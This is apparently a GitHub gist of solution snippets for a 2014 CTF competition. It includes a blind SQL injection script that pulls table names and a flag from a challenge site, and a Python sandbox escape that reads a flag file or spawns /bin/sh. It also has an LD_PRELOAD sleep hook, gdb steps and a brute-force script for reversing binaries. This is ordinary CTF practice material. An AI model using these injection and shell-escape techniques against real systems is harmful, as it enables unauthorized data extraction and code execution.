Skip to content

Instantly share code, notes, and snippets.

@carpedm20
Last active August 29, 2015 14:06
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save carpedm20/72b5262f5dc654548fd2 to your computer and use it in GitHub Desktop.
HeXA 2nd CTF by tunz (2014.09.13)
print 'aaa'*2+hex(0x20acecafe-0xdeadbeef-eval('0x'+'aaaa'.encode('hex'))*2)[2:].decode('hex')
import subprocess
flag=open('flag','r').read()
string = "The"
while True:
for i in range(32,126):
f = open('123','w')
tmp_string = string + chr(i)
f.write(tmp_string)
f.close()
subprocess.call(["./rev200","123","output"], stdout=subprocess.PIPE)
cracked = open('output','r').read()
if cracked in flag:
print "find : %s" % chr(i)
string = tmp_string
print "************* : " + string
break
gdb rev50
(gdb) b check_password
(gdb) b *(check_password+82)
(gdb) x/10s $rdi
// System call `sleep` hooking
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
unsigned int sleep (unsigned int __seconds)
{
return 0;
}
// gcc -shared -ldl -fPIC test.c -o libdl_prog3.so
// LD_PRELOAD=/home/carpedm20/ctf/libdl_prog3.so ./rev80
// gdb rev80
// ...
// find the flag
sys.stdout.write(open('/home/sys50/flag').read())
# Other solution from `silvara`
# __import__('os').execl('/bin/sh','sh')
file:///home/web100/flag
import requests
import time
s = requests.Session()
data = {'loginID':'asdf','loginPW':'asdf'}
r = s.post('http://web150.tunz.kr/login_ok.php',data=data)
print r.text.find('2014')
url = "http://web150.tunz.kr/ajax/add.php?sindex=0'"
if True:
#query = url + " or ascii(substr((select table_name FROM information_schema.tables limit 1 offset %s),%s,1))>%s -- "
#query = url + " or ascii(substr((select column_name FROM information_schema.columns where table_name='flag_hidden' limit 1 offset %s),%s,1))>%s -- "
query = url + " or ascii(substr((select flag FROM flag_hidden limit 1 offset %s),%s,1))>%s -- "
for i in range(0,100):
data = query % (i, 1, 1)
r = s.get(data)
print "========= %s ==========" % i
if 'Wrong' not in r.text:
tb = ""
for character_idx in range(1,50):
for character in range(32, 126):
data = query % (i, character_idx, character)
r = s.get(data)
if 'Already' not in r.text: #True response
print chr(character)
tb += chr(character)
break
print tb
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment